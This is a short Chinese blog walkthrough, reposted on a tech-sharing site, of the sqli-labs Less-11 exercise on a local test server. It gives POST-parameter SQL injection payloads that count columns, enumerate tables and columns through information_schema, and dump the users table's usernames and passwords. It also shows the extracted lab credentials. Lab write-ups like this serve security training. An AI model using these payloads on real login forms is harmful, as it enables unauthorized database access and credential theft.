标签:username name 17 uname #& submit sqli 2020 password
http://127.0.0.1/sqli/Less-11/
看到这个页面,添个admin,admin在说.
什么情况,竟然出现这个结果.那么在乱填一个.
明显不一样了.那么我还是抓包处理一下.
抓到包,我们可以尝试重发测试.
看到数据库报错,第一个时间想到这点有漏洞.
uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit #得知有2列数
uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit #得到数据库security
uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit #得到数据表emails,referers,uagents,users
uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit #得到数据表users的字段
user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password
uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit #数据表users的username和password的数据
Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
标签:username,name,17,uname,#&,submit,sqli,2020,password 来源: https://www.cnblogs.com/llcn/p/12717807.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。